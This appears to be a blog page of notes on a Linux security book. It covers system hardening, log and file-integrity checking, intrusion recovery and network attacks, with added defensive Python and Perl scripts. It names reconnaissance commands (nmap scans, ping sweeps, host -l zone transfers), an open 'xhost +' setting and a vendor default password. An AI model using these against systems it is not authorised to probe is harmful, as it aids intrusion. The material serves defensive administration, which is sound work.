  Linux system security knowledge
  Add Date : 2018-11-21      
My comment:
This book covers the security aspects of Linux and presents its ideas clearly in a question-and-answer format. It provides many useful security tips and is an essential reference for Linux system maintainers. Through it you can gain an overall picture of Linux security, from system security to application security and from single-host security to network security. But security is a continuously changing, continuously updated process rather than a single solution; the book only covers the security problems known at the time it was written, and newly emerging issues can be followed through security advisories and the book's online site.
Chapter 1: Overview of Linux security
Sticky bit
If a user has write permission on a directory, they can delete the files and subdirectories in it even when they are not the owner of those files and have no read or write permission on them. The sticky bit occupies the execute-permission position for "others" and is shown as t. When it is set, users cannot remove files or directories they do not own. Subdirectories created beneath such a directory do not inherit the setting; it has to be set again before use.
# chmod 1770 xxx
File attributes
The chattr command changes file attributes; the lsattr command lists them.
Attribute definitions:
A  Do not update the file's atime. Useful for limiting disk I/O on a laptop or over NFS; apart from the 2.0 series, other kernels do not support this attribute.
a  The file can only be opened in append mode; only root can set this attribute.
c  The kernel automatically compresses the file when it is saved to disk.
d  The file is marked so that it is not dumped.
i  The file cannot be modified, deleted or renamed, no link can be created to it, and no data can be written to it.
s  When the file is deleted, its disk blocks are zeroed.
S  When the file is modified, the writes are performed synchronously.
u  When the file is deleted, its contents are preserved (so that it can be undeleted).
ulimit command
Limits can be set by adding ulimit commands to the profile file, or defined in the /etc/security/limits.conf file.
Command parameters:
-a  show all limits
-c  core file size limit
-d  process data segment size limit
-f  limit on the size of files the shell can create
-m  resident memory size limit
-s  stack size limit
-t  CPU time limit, in seconds
-p  pipe size
-n  limit on the number of open files
-u  limit on the number of processes
-v  virtual memory limit
Besides the ulimit command, limits can also be defined in /etc/security/limits.conf. Each line has the form:
domain type item value
domain is a user name, or a group name beginning with @; * means all users. type is hard or soft. item is the resource to limit, such as cpu, core, nproc or maxlogins. value is the corresponding limit.
# kill -TERM XXXX    send the termination signal to process XXXX
# kill -HUP HTTPD    send the hangup signal, which makes the daemon reread its configuration
Privileged ports
Only root can bind ports below 1024. A connection that originates from a port below 1024 on a remote machine can therefore be trusted as having been made by root on that machine.
Chapter 2: Preventive measures and recovery from intrusion
System security
Simple find command
# find / \( -perm -02000 -o -perm -4000 \) -ls
This identifies every setuserid and setgroupid file on the system. Under the strictest policy, the setXid bit can be removed from every installed program except /bin/su.
System security scanning tools: COPS, Tiger, Nabou
Scan detectors
The first thing done to a system from the network is to scan it. A scan detector that reports the scan in time, before the system is broken into, is a good intrusion detection system (IDS).
Klaxon, Courtney, Scanlogd, PortSentry
Hardening the system
The Bastille project creates a set of modules to harden a newly released Red Hat system. It can be run after the system is installed, and at any time afterwards; the system does not have to be freshly installed.
The hardening method is: download the source code to the /root directory and unpack it. As root, run the InteractiveBastille.pl script; while you answer its questions, the program makes the corresponding changes. After configuration, the tool saves the answers in BackEnd.pl. To harden similarly configured servers, copy it to the new server and run AutomatedBastille.pl.
Openwall Linux patch
This is a kernel patch. For the patches to take effect, the user must recompile and install the newly patched kernel. In some cases these patches are not fully compatible with the standard Linux kernel, so be sure to understand what they contain before deciding to use them.
LIDS
LIDS includes a kernel-level port scan detection routine and a security alert program. It is a kernel patch (currently for 2.2.x and 2.4.x, but 2.2 will no longer be supported in the future) plus system administration tools. Its features include:
1. Advanced file protection: even root cannot find or tamper with files protected by LIDS.
2. Process protection: the kernel refuses to deliver signals (such as SIGKILL) to protected processes, and a process can be hidden completely, leaving no trace in /proc.
3. Better access control, making more effective use of capabilities, including prohibiting root from changing those capabilities.
4. Built-in port scan detection: the built-in kernel scanner can detect most of the scans performed by tools such as Nmap and SATAN.
To install LIDS, download the latest official Linux kernel source and LIDS, apply the LIDS patch to the kernel, then recompile the kernel.
Log file analysis
syslogd messages are tagged with a facility and a level, and in /etc/syslog.conf the destination of messages can be set according to these two attributes.
syslogd facility descriptions
auth      security/authentication messages (deprecated)
authpriv  security/authentication messages
cron      cron and at
daemon    other system daemons (sshd, xinetd, pppd, etc.)
kern      kernel messages
lpr       line printer system
mail      mail subsystem (sendmail, postfix, qmail, etc.)
news      Usenet news messages
syslog    messages generated internally by syslog
user      generic user-level messages
uucp      UUCP subsystem
local0-local7  custom facilities
Log level descriptions
emerg    system is unusable
alert    action must be taken immediately
crit     critical condition
err      error
warning  warning
notice   normal but significant condition
info     informational message
debug    debug message
Format of each syslog.conf line
facility.loglevel logtarget, with the fields separated by tabs.
daemon.notice /var/log/daemon.log sends all messages from the daemon facility with priority notice or higher to the file /var/log/daemon.log. An asterisk can be used in place of the facility or the level to match all of them.
Target descriptions
/path/to/filename     append messages to the end of the named file; this is the most common case.
@loghost              send to the syslog server on host loghost. This makes it easy to collect the logs of many machines in one place.
|/path/to/named_pipe  write to the named pipe (convenient for filtering messages with an external program).
user1,user2           write to the terminals of the listed users.
*                     write to all logged-in users.
/dev/console          write to the named terminal.
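The selector rules just listed can be checked mechanically. The following Python script is an added example, not code from the page or from the syslog project: it parses a small constructed syslog.conf (tab-separated facility.level and target lines, as described above) and answers where a message with a given facility and priority would be delivered, treating a level as "that priority or higher" and * as a wildcard. Comma-separated facility lists and the none priority of later syslogds are not handled, since the page does not describe them.

```python
# Added example: a small parser for the syslog.conf line format
# "facility.level<TAB>target" described above.  It answers the question
# "which targets receive a message of this facility and this priority?",
# honouring the rule that a level means that priority or higher and that
# "*" matches every facility or every level.
LEVELS = ["debug", "info", "notice", "warning", "err", "crit", "alert", "emerg"]
FACILITIES = {"auth", "authpriv", "cron", "daemon", "kern", "lpr", "mail",
              "news", "syslog", "user", "uucp"} | {f"local{i}" for i in range(8)}


def parse_syslog_conf(text):
    """Return a list of (facility, level, target) rules; raise on bad lines."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)          # selector, then the tab-separated target
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: selector without target: {raw!r}")
        selector, target = parts
        for sel in selector.split(";"):      # several selectors may share one target
            facility, dot, level = sel.partition(".")
            if not dot:
                raise ValueError(f"line {lineno}: bad selector {sel!r}")
            if facility != "*" and facility not in FACILITIES:
                raise ValueError(f"line {lineno}: unknown facility {facility!r}")
            if level != "*" and level not in LEVELS:
                raise ValueError(f"line {lineno}: unknown level {level!r}")
            rules.append((facility, level, target.strip()))
    return rules


def targets_for(rules, facility, level):
    """Targets a message (facility, level) is written to, in config order."""
    targets = []
    for rule_fac, rule_lvl, target in rules:
        if rule_fac not in ("*", facility):
            continue
        if rule_lvl != "*" and LEVELS.index(level) < LEVELS.index(rule_lvl):
            continue                          # less urgent than the rule asks for
        if target not in targets:
            targets.append(target)
    return targets


# Constructed sample configuration (not a real /etc/syslog.conf).
SAMPLE_CONF = (
    "# constructed sample\n"
    "daemon.notice\t/var/log/daemon.log\n"
    "kern.*\t/dev/console\n"
    "authpriv.*\t/var/log/secure\n"
    "*.emerg\t*\n"
    "*.info\t@loghost\n"
)

if __name__ == "__main__":
    rules = parse_syslog_conf(SAMPLE_CONF)
    for fac, lvl in [("daemon", "notice"), ("daemon", "debug"), ("authpriv", "emerg")]:
        print(f"{fac}.{lvl:<8} -> {targets_for(rules, fac, lvl)}")
```

Running it shows that a daemon.notice message lands in both /var/log/daemon.log and on loghost, while daemon.debug matches no rule at all, which is exactly the kind of gap a log reviewer wants to find before an incident rather than after.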
Log file permissions
Logs should be readable and writable only by root; they can also be made readable by a log group (or whatever group you choose), with no access for other users. The reason: a user sometimes types their password where the user name is expected, and when the login fails the "user name" (in this case the password, because of the user's mistake) is recorded in the log. So create a fictitious user belonging to the log group and run all log checkers as that user instead of root. Log inspection programs should not run as root.
Log monitoring can be started with log analysis software such as logcheck, swatch and logsurfer, but the best tool is still a script written by the administrator.

File system integrity checking
Modifying the file system is one of the things intruders usually do after breaking into a system. Some frequently modified files:
Type                        Examples
Server configuration files  /etc/inetd.conf, /etc/ftpaccess
Network configuration files /etc/host.conf, /etc/sysconfig/network
System configuration files  /etc/ld.so.conf, /etc/nsswitch.conf
crontab                     /etc/cron.daily/*, /var/spool/cron/root
setuserid programs          /bin/su, /bin/ping, /usr/bin/chfn, /sbin/dump
setgroupid programs         /sbin/netreport, /usr/bin/lpr, /usr/bin/write, /usr/bin/man
If you know when the machine was compromised, you can work out what was modified after that time. For example, to find all files modified since the intrusion on September 17, run:
# touch -t 09170000 /tmp/comparison
# find / \( -newer /tmp/comparison -o -cnewer /tmp/comparison \) -ls
But remember that the timestamps reported for a file are unreliable: the touch command can change any file's modification time (mtime) and access time (atime).
Checksums
A checksum is a string produced by a mathematical algorithm that can be used to determine whether two files are identical: if even a single bit of a file changes, its checksum will be different. The md5sum command is usually used.
# md5sum xxx
File permissions
By examining file permissions, the user can tell when a modification happened, decide whether it was legitimate, accidental or malicious, and judge its impact on the system.
Checksum and permission database generation and verification
The following is a quick Perl script to run on the system before it is broken into; it lets the user build their own database (a text file) of file permissions and checksums. Digest::MD5 and File::Find replace the obsolete MD5 module and find.pl used by the original.
#!/usr/bin/perl
# Generate a database of file modes, owners and MD5 checksums for the
# directories given on the command line.
# Usage: perl checksums.pl /bin /sbin /usr/bin > checksums.txt
use strict;
use warnings;
use Digest::MD5;
use File::Find;

my $md5 = Digest::MD5->new;
my @files;
# Walk every directory given on the command line and collect the paths.
find(sub { push @files, $File::Find::name }, @ARGV);

for my $name (sort @files) {
    my ($mode, $uid, $gid) = (stat $name)[2, 4, 5];
    my $stat = sprintf "%0o", $mode;
    # Directories, devices and other non-regular files: record mode and owner only.
    unless (-f _) {
        print "$stat\t$uid $gid\t\t\t\t\t\t$name\n";
        next;
    }
    $md5->reset;
    open my $fh, '<', $name or do { print STDERR "Can't open file $name\n"; next; };
    binmode $fh;
    $md5->addfile($fh);
    close $fh;
    my $checksum = $md5->hexdigest;
    print "$stat\t$uid $gid $checksum\t$name\n";
}
Do not keep the database on the same machine; put it on another machine, or on write-once read-many media (a CD-R).
Existing file integrity tools: Tripwire, AIDE, Nabou
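To use such a database after a break-in (step 5 of the damage assessment below asks for exactly this comparison), the saved baseline has to be diffed against a fresh run. The following Python script is an added example, not the book's or the page's code: it parses two database texts in the format the Perl script above prints (mode, uid gid and an optional checksum, then the name, tab-separated) and reports added, removed and changed entries, and singles out any program that has acquired a setuid or setgid bit. The checksum strings in the sample data are constructed placeholders, not real MD5 values.

```python
# Added example: compare a baseline permission/checksum database (written
# to read-only media before the break-in) with one generated afterwards.
# Input format, as printed by the Perl script above:
#   <octal mode>\t<uid> <gid> <md5>\t<name>            for regular files
#   <octal mode>\t<uid> <gid>\t\t\t\t\t\t<name>         for everything else
SETXID_MASK = 0o6000   # setuid (04000) and setgid (02000) bits of st_mode


def parse_db(text):
    """Map each path to its recorded mode, owner and (optional) checksum."""
    entries = {}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        parts = raw.split("\t")
        mode, name = parts[0], parts[-1]
        fields = parts[1].split()            # "uid gid" or "uid gid checksum"
        entries[name] = {
            "mode": mode,
            "uid": fields[0],
            "gid": fields[1],
            "checksum": fields[2] if len(fields) == 3 else None,
        }
    return entries


def has_setxid(entry):
    return bool(int(entry["mode"], 8) & SETXID_MASK)


def compare_db(baseline_text, current_text):
    """Return added/removed/changed paths and newly setXid programs."""
    base, cur = parse_db(baseline_text), parse_db(current_text)
    report = {"added": [], "removed": [], "changed": [], "new_setxid": []}
    for name in sorted(set(base) | set(cur)):
        if name not in cur:
            report["removed"].append(name)
            continue
        if name not in base:
            report["added"].append(name)
            if has_setxid(cur[name]):
                report["new_setxid"].append(name)
            continue
        diffs = [k for k in ("mode", "uid", "gid", "checksum")
                 if base[name][k] != cur[name][k]]
        if diffs:
            report["changed"].append((name, diffs))
        if has_setxid(cur[name]) and not has_setxid(base[name]):
            report["new_setxid"].append(name)
    return report


# Constructed sample databases; the checksum strings are placeholders.
BASELINE = (
    "40755\t0 0\t\t\t\t\t\t/bin\n"
    "100755\t0 0 md5-ls-original\t/bin/ls\n"
    "104755\t0 0 md5-su-original\t/bin/su\n"
    "100644\t0 0 md5-inetd-original\t/etc/inetd.conf\n"
    "102755\t0 5 md5-write-original\t/usr/bin/write\n"
)
CURRENT = (
    "40755\t0 0\t\t\t\t\t\t/bin\n"
    "104755\t0 0 md5-ls-original\t/bin/ls\n"              # same bytes, but now setuid root
    "104755\t0 0 md5-su-original\t/bin/su\n"
    "100644\t0 0 md5-inetd-modified\t/etc/inetd.conf\n"   # configuration edited
    "104755\t0 0 md5-unknown\t/tmp/.x/sh\n"               # new setuid shell
)

if __name__ == "__main__":
    for key, value in compare_db(BASELINE, CURRENT).items():
        print(f"{key:>10}: {value}")
```

Note that /bin/ls is reported even though its checksum is unchanged: a mode change alone turned it into a setuid-root binary, which is why the database records permissions as well as checksums.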
How to know when the system has been broken into
Ways of discovering an intrusion:
1. The home page has been changed.
2. A sharp drop in free disk space; check disk usage with df.
3. Unusually heavy network use; check the output of netstat -na or lsof to see which connections exist.
4. Contact from another administrator reporting that your machine is being used to attack other machines.
5. A network interface in promiscuous mode: an intruder who wants to sniff the network services available on the system will put a network interface into promiscuous mode (capturing every packet). Check the output of ifconfig -a for PROMISC to determine the interface mode.
6. Erased or truncated log files; check syslog.
7. Corrupted utmp/wtmp.
8. New users. Intruders usually pick names similar to existing user names to reduce the chance of being noticed, for example lpr or lp, or something resembling uucp1, or hacker-dialect names such as t00r and own3d.
9. Strange programs running.
10. Unexplained CPU usage.
11. A local user account being compromised from remote.
12. Things that "look weird".
Measures to take after an intrusion
Containing the damage
1. Shut down all network interfaces. This takes away the intruder's ability to interact with the system, but their processes are still running and will keep running.
2. Switch the system to single-user mode. This terminates all legitimate root processes and all user processes; any process that remains may belong to the intruder.
3. Reboot the system from an undamaged Linux boot disk. Mount the system read-only and inspect it to see what the intruder has tampered with.
4. Limit the serious damage.
Damage assessment
Mount all partitions read-only and record everything you find.
1. Look for suspicious files and directories: password files, hacking tools, and any directory that does not belong on your system. These directories may not have been visible before the reboot.
2. Locate new setuserid programs; any new setXid program (especially one owned by root) is highly suspicious.
3. Check timestamps to find files changed after the break-in.
4. Read the log files; check all of them.
5. Verify the checksum database: validate and compare the files from before and after the break-in.
6. Verify the installed packages and confirm their versions; intruders can downgrade software so that the system uses an insecure version.
7. Manually verify the configuration files to quickly identify changes, such as the web server running as root or additional servers appearing in /etc/inetd.conf.
8. Back up the files.
9. Special tools: many tools help with checking the system; the newest is The Coroner's Toolkit.
10. Notify the authorities.
Restoring service
Once a break-in has been confirmed there are two options: 1. plug the hole and re-enable the tampered parts of the system from backup; 2. reinstall the system. The safest method is a complete reinstall.
Just plugging the hole you found usually gets you running again much faster, but you may not identify everything the intruder did to the system. Intruders can leave time bombs that go off months later, and may have modified system binaries so that the system becomes unstable. So the best way to get the intruder out of the system is recommended as follows:
1. Back up the important files.
2. Completely reformat all drives (this is also the best time for any system changes, such as adding disks or changing partition sizes, to make full use of the downtime).
3. Reinstall the Linux distribution with only the essential packages.
4. Fully upgrade all installed packages.
5. Generate checksums and store them in a safe place.
6. Modify the necessary configuration files by hand. Do not just copy them from the backup; they may have been changed.
7. Copy the necessary files from the backup.
8. Re-check the files restored from backup to make sure they have not been damaged or trojaned.
9. Compute the checksums again and check the file system with another method.
10. Only now enable the network.
A common strategy against an actual or suspected attack is to take away the attacking machine's ability to communicate with this machine. Specifically there are several ways:
1. Use TCP wrappers to reject connections from the intruder's IP address.
2. Use iptables rules to drop or reject packets from that IP address.
3. Create a rejecting route so that this machine cannot communicate with that IP address; packets from that source address can still be received, but we cannot reply, which breaks the communication between the two.
4. Create a similar deny entry in the firewall's access list.

Chapter 3: Reconnaissance of machines and networks
Newsgroup and mailing list searches
There are many newsgroups, mailing lists and forums on the Internet; they are good places to ask knowledgeable people questions, but information about your systems may be disclosed completely unintentionally, for example the company's network topology, security configuration, telephone numbers, administrator names and other personal information.
Re-read your postings carefully before sending and delete any information an intruder could exploit, or post from an account not related to your system, such as a free e-mail account.
whois database
ping scanning
ping scanning means pinging every IP address in a given network; if a machine is listening on that IP address it responds to the ping, and we then know it is alive. Intruders list all machines this way and then decide which target to attack.
There are two different methods of pinging hosts: ICMP ping and echo ping. Some tools can be used to speed up pinging; the two most useful are fping and nmap.
ICMP ping method: the source machine sends an ICMP echo request to the destination; if the target machine is running it replies with an ICMP echo reply.
# ping -c 3 target
echo ping method: a UDP or TCP packet is sent to the target machine's echo port (port 7); if the machine is up, the port sends the data straight back.
# telnet target.example.com echo
fping is a straightforward ping tool; the machines to ping can be listed on the command line or read from a file (with -f).
# fping -a host1 host2
# fping -a -f hostlist
nmap is a versatile scanning tool with a built-in ping scan function.
# nmap -sP <network>
Countermeasures against ping scans
Configure the machine (with iptables etc.) to reject incoming echo request packets and outgoing echo reply packets, so that it never answers an ICMP echo request. Turn off the machine's echo service: comment out the following two lines in /etc/inetd.conf
echo stream tcp nowait root internal
echo dgram udp wait root internal
and restart inetd.
DNS issues
On Linux the best DNS server is BIND. It has several versions: if you like to be at the leading edge, BIND 9.x is the best choice; 4.x is the most stable; 8.x is a good middle ground, and most sites use it. Keep BIND at its latest version: it has had many security holes, and once a vulnerability is discovered it is exploited.
Avoid putting HINFO and TXT records in the configuration (zone) files.
Zone transfers
Normally, to keep DNS always available, each domain has one primary DNS machine and the others are secondary DNS machines. Whenever the zone changes, the secondary machines copy the whole contents from the primary. To make a system a secondary DNS server, add the following to named.conf:
zone "example.com" {
    type slave;
    file "slave/example.com";
    masters { xxx.xxx.xxx.xxx; };
};
But intruders can also grab the zone file if no precautions are taken. The following example uses the host command to list all the NS, A and PTR records of a whole domain:
# host -t ns example.com
# host -l example.com
When configuring the primary name server, allow zone transfers only to the secondary server machines. The global default is set in the options statement as follows:
options {
    allow-transfer { xxx.xxx.xxx.xxx; };
};
Warning: zone transfers must be restricted on both the master and the slave servers, because a slave server also accepts zone transfer requests.
Any unauthorized zone transfer is logged via syslog.
Reverse resolution
Reverse resolution means finding the domain name from the IP address; the host command can be used for this too. If a large number of real host names are used, intruders learn the function of each machine. It is best to use generic names in PTR records.
Port scanning
Intruders run one or more port scanning tools to learn which services the target system provides. Tools include netcat, strobe and nmap (the best). Playing with nmap teaches a lot, including about your own systems and networks.
Network vulnerability scanners
ISS, SATAN, Nessus
Encrypting file systems
CFS, TCFS, BestCrypt, PPDD, Encrypted
Chapter 4: Social engineering, Trojan horses and other intruder tricks
Chapter 5: Physical attacks
Summary of physical attacks
1. Do not write down passwords or IDs where others can see them.
2. Do not leave phone books, organization charts, memos, internal manuals, meeting schedules or internal security policies where they can easily be read or stolen.
3. Be careful when discarding printed documents, electronic media or customer data: mark sensitive material as "sensitive", shred sensitive documents and manuals before disposal, erase the data on electronic media, and keep all rubbish in a well-lit, well-protected area.
4. Label the network infrastructure carefully. Record this information in a clear network diagram and keep it locked up.
5. Use a good password-protected screen saver that hides the screen contents while it runs. Set the delay to a reasonable value so that it starts after a reasonable time.
6. Lock the screen whenever you leave the system.
7. Keep a portable machine close at hand at all times as far as possible, and be alert to the tricks thieves use to take it from you. Label every laptop that enters the workplace and check it on the way out.
8. Avoid dual-boot systems: the security of Linux then depends on the least secure system installed on the machine.
9. Set a password on the boot loader, to prevent someone from obtaining root privileges by rebooting the machine in an illegitimate way.
10. Set a BIOS password so that the BIOS settings cannot be changed.
11. Keep all sensitive systems in a locked room to prevent damage.
12. Use a good file encryption system, which prevents anyone who gains system privileges from reading confidential data. This should serve as a baseline of security and defence.
Chapter 6: Network attacks
Legal TCP flag combinations
Flag combination   Meaning
SYN        The first packet of a TCP connection, expressing the wish to establish a connection with the target system.
SYN|ACK    The target system acknowledges the original SYN and sends its own SYN in response.
ACK        Every packet after the connection is established has its ACK bit set, to acknowledge receipt of the preceding data.
FIN        When ready to close the connection, each side sends a FIN to the other.
FIN|ACK    This combination acknowledges the first FIN packet and completes the close procedure.
RST        When a system receives an unwanted packet, it sends an RST packet to reset the connection, for example when it receives a SYN|ACK without having sent a SYN.
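The table above gives the legal combinations; a defender's detector applies them in reverse and flags everything else. The following Python code is an added example, not from the page or from any particular IDS: it reads the flag byte at offset 13 of a constructed TCP header, names the flags that are set, and checks the combination against the table. Two assumptions go beyond the page: PSH and URG are treated as modifiers that do not affect legality, and RST|ACK (the usual reply to a SYN aimed at a closed port) is accepted alongside the page's six combinations. The sample headers and addresses are constructed.

```python
# Added example: classify TCP segments by their flag combination.
# Flag bits as they appear in byte 13 of the TCP header (RFC 793 order).
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# The legal combinations from the table above, plus RST|ACK (assumption:
# the standard reply to a SYN sent to a closed port).
LEGAL_COMBINATIONS = {
    frozenset({"SYN"}), frozenset({"SYN", "ACK"}), frozenset({"ACK"}),
    frozenset({"FIN"}), frozenset({"FIN", "ACK"}), frozenset({"RST"}),
    frozenset({"RST", "ACK"}),
}
MODIFIERS = {"PSH", "URG"}   # assumption: delivery hints, ignored when judging legality


def flags_from_header(header):
    """Names of the flags set in a 20-byte (or longer) TCP header."""
    if len(header) < 20:
        raise ValueError("TCP header must be at least 20 bytes")
    byte = header[13]
    return frozenset(name for name, bit in TCP_FLAGS.items() if byte & bit)


def classify(flags):
    """'legal' if the connection-control flags form a table entry, else 'anomalous'."""
    control = frozenset(flags) - MODIFIERS
    return "legal" if control in LEGAL_COMBINATIONS else "anomalous"


def suspicious_sources(segments):
    """Count anomalous segments per source address; input is (src, header) pairs."""
    counts = {}
    for src, header in segments:
        if classify(flags_from_header(header)) == "anomalous":
            counts[src] = counts.get(src, 0) + 1
    return counts


def make_header(flag_byte):
    """Constructed 20-byte TCP header: ports 40000->80, data offset 5, given flags."""
    return bytes([0x9c, 0x40, 0x00, 0x50]) + bytes(8) + bytes([0x50, flag_byte]) + bytes(6)


# Constructed sample traffic (not a real capture).
SAMPLE = [
    ("192.0.2.10", make_header(0x02)),    # SYN: opening a connection
    ("192.0.2.10", make_header(0x18)),    # PSH|ACK: data on an open connection
    ("192.0.2.10", make_header(0x11)),    # FIN|ACK: closing
    ("198.51.100.7", make_header(0x03)),  # SYN|FIN: never legitimate
    ("198.51.100.7", make_header(0x00)),  # no flags at all ("null")
    ("198.51.100.7", make_header(0x06)),  # SYN|RST: never legitimate
]

if __name__ == "__main__":
    for src, hdr in SAMPLE:
        flags = flags_from_header(hdr)
        print(src, sorted(flags), classify(flags))
    print("anomalous segments per source:", suspicious_sources(SAMPLE))
```

Because the page's table lists FIN on its own as legal, a FIN-only segment passes this check; a stricter site policy could drop that entry from LEGAL_COMBINATIONS, since in practice a FIN is almost always accompanied by ACK.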
ICMP type codes
Type   Message
0      echo reply (response to ping)
3      destination unreachable
4      source quench
5      redirect
8      echo request (ping)
11     TTL exceeded
12     parameter problem
13     timestamp request
14     timestamp reply
17     address mask request
18     address mask reply
Attacks on misconfigured NFS exports
To protect against unauthorized access to the file system, the firewall should block NFS by denying incoming connections to port 2049. If NFS is needed internally, make sure that only the necessary file systems are exported; for example, to allow remote mounting of users' home directories, export /home rather than /. To verify that NFS is configured correctly, check /etc/exports and /etc/dfs/dfstab and make sure that nothing is exported to the outside with read-write permission.
Attacks on the Netscape default configuration
SuiteSpot is a tool for managing the web server; it contains Java and JavaScript code that implements this function. The user name and password for the Netscape server configuration are saved in a file under the server root which by default can be read by anyone, located at /web_server_root/admin-serv/config/admpw. Pointing a web browser at the URL of this file over the network retrieves it. Its format is user:password; although the password is encrypted, it can be brute-forced. The admpw file should be protected.
Attacks on a misconfigured Squid server
Squid can be misconfigured so that external hosts can use it as a proxy to reach internal system addresses. This lets an attacker use the server as a proxy to view or access the internal network, even if the addresses are not routable. An erroneous squid.conf setting is as follows:
First, set the firewall rules on the external address correctly to block connections to port 3128 (the proxy port). Then edit the configuration file and make sure the following content is correct.
The X Window System
It uses ports 6000 to 6063.
Attacks on X misconfiguration: xhost is the basic tool for X security; users use it to specify which systems are allowed to connect to the local X server. Run with no parameters it lists all the systems allowed to connect, and a new system is added by appending its name to the following command:
# xhost +
If the system name is omitted, as above, any system may connect. An intruder can then use the xkey program to record every keystroke the user types in the X Window interface. Another similar program is xscan, which can scan a network for vulnerable X systems.
The main countermeasure is to block ports 6000 to 6063 on the firewall:
# ipchains -A input -p tcp -j DENY -s 0/0 -d 0/0 6000:6063
If they are not blocked, start X with xinit using the -auth parameter; the system then uses "magic cookies" for authentication. Alternatively, tunnel the X session over ssh. When X11 forwarding over ssh is used, a remote root user has full privileges on the local X server, so use X11 over ssh only when both sides trust each other.
Default passwords
Red Hat provides the Piranha virtual server and load balancing package for Linux servers. In version 0.4.12 of the piranha-gui program there is an account named piranha whose default password is q.
The countermeasure is to change the default passwords of all systems and network devices.
Sniffing network information
When a sniffer is running, the network card is set into so-called promiscuous mode; in this mode the card passes every frame it receives up to the protocol stack without checking its MAC address. The system running the sniffer can thus examine every frame and extract the interesting information from it, including header information and other data such as passwords and user names. Many protocols send sensitive information unencrypted, so an intruder with a sniffer can obtain access to systems. The passwords and user names of telnet, ftp and http travel across the network in the clear; in addition, some web-based management tools transmit user names and passwords over plain http, webmin for example. The best way to avoid sniffing is not to transmit user names and passwords across the network unencrypted: using ssh instead of telnet and https instead of http for sensitive information greatly improves security.

Common sniffers
tcpdump, hunt, linux-sniff, snort
Password guessing
On most Linux systems the password length is limited to eight characters. Using only lowercase letters there are 26 to the 8th power (about 209 billion) combinations; if uppercase letters and digits are also allowed there are 62 to the 8th power (about 218 trillion) combinations.
Protect the system accounts: turn off the finger and rwho services. Restrict root logins to the console only; this is done by editing the /etc/securetty file, which lists the ttys (terminals) root may log in from. If it contains only tty1 to tty6, root can log in only from the console. If you delete all the lines from the file, anyone who wants root privileges must first log in as another user and then use su. Adjust the minimum password settings in /etc/login.defs.
Buffer overflow vulnerabilities
When a developer writes a program's code in the wrong way, the program may suffer a buffer overflow. The main culprits are the standard C string functions, for example strcat(), strcpy(), sprintf(), vsprintf(), scanf() and gets(); these functions do not check the size of their arguments before operating on them. Programs that have been attacked this way include rpc.mountd (NFS), rpc.statd (NFS), imapd/popd and wu-ftpd. Once someone attempts a buffer overflow against the system, the attempt can usually be seen in the log messages.
For unnecessary services, shut them down or block access to them at the firewall. If a service is required, the only measure is to keep the system up to date with the latest patches.
The netstat and lsof tools can identify the running programs, open ports and other information on a system, but these programs are not reliable: they can be replaced by an intruder. Scan the system from outside with nmap to identify the services it runs, because an external scan is not fooled by an intruder's tampering inside the system.
# nmap -sT -O xxxx    TCP scan of the system
# nmap -sU -O xxxx    UDP scan of the system
Chapter 7: Malicious use of the network
DNS attacks
BIND cache spoofing
DNS is a distributed system that uses caching to reduce network load. BIND versions 4.9.6 and 8.1.1 had a problem: they did not verify the legitimacy of information received from other name servers. Intruders can exploit this to insert forged records into the caching server and direct clients to the intruder's machine, thereby capturing passwords and sensitive information.
Source routing
Source routing lets the sender specify the path a packet takes through the Internet to its destination. This feature is useful for network exploration but can also be used to bypass security gateways and address translation.
# cat /proc/sys/net/ipv4/conf/eth0/accept_source_route    0 means not allowed, 1 means allowed
Incorrect IP forwarding
/proc/sys/net/ipv4/ip_forward is the IP forwarding configuration file: 0 disables forwarding, 1 enables it. This function is necessary for firewalls and IP masquerading gateways, but unnecessary for name servers, mail servers or bastion hosts. It can be disabled as follows:
# echo 0 > /proc/sys/net/ipv4/ip_forward
The line net.ipv4.ip_forward = 0 in /etc/sysctl.conf controls whether the system enables it at startup.
A tool with both packet sniffing and session hijacking functions.
Countermeasure: use OpenSSH.
dsniff
A collection of excellent network auditing, penetration testing and sniffing tools.
sshmitm
It poses as the ssh server to the client and as the ssh client to the server; by default it records all user names and passwords.
sshmitm depends on the user not checking the ssh host key. When a client first connects to a server, it adds the server's host key to $HOME/.ssh/known_hosts. That key should be compared with the actual server key (usually in the file /etc/ssh/ssh_host_key.pub on the server) for consistency. If they do not match, an intruder was already in the middle of the earlier session and has obtained the password; disconnect immediately and notify the system administrator to reset the password so that the account cannot be abused. To prevent accidentally using a potentially unsafe connection, ssh should be configured to enforce host key checking by writing the following lines at the beginning of $HOME/.ssh/config:
Host *
    StrictHostKeyChecking yes
StrictHostKeyChecking can also be set in the system-wide ssh_config file.
Currently sshmitm supports only ssh version 1, but there is no guarantee that software supporting ssh version 2 is not being developed.
webmitm
It works much like sshmitm: it listens on ports 80 (http) and 443 (https), relays requests to the real web server and returns the results to the client. Because webmitm has no real SSL server certificate and key, it must fake them, so the first time it runs it uses openssl to generate an SSL key and certificate. When a user connects to an https site, the browser tries to verify the SSL certificate it receives, but the certificate created by webmitm carries no signature from a trusted issuing authority stored in the browser, so the browser pops up a series of dialogs asking the user to confirm whether they want to connect to a possibly fraudulent site. If the user clicks through and ignores all the warnings, the site can be visited as if everything were normal, but the session actually flows through webmitm, which can access all the data.
As with sshmitm, more important than the technical problem is user training: when the browser asks "Are you sure?" many times, the question deserves thought, not simply clicking Yes.
SYN flood attack
Under TCP/IP, when the server's TCP stack receives the initial SYN packet it adds a half-open connection record to a queue and waits for the remaining handshake packets; when the handshake completes, the record is removed from the queue. The queue holds only a limited number of half-open records, so if many connections are started but never complete the handshake there is a problem: once the queue is full, the server no longer accepts new connections. An attacker who can send SYN packets to the target fast enough to keep the queue full can block any TCP service. This is the SYN flood attack. If the web server is not accepting requests, or even local connections are very slow, use netstat -nat to look for connections in the half-open SYN_RECV state. Once the system is under SYN attack, the following shell script tracks the number of half-open connections:
#!/bin/sh
while :; do
    printf 'half-open connections: '
    netstat -nat | grep SYN_RECV | wc -l
    sleep 1
done
If the count drops to zero, the attacker has given up. If it reaches a maximum and then stays level, the queue is unfortunately full.
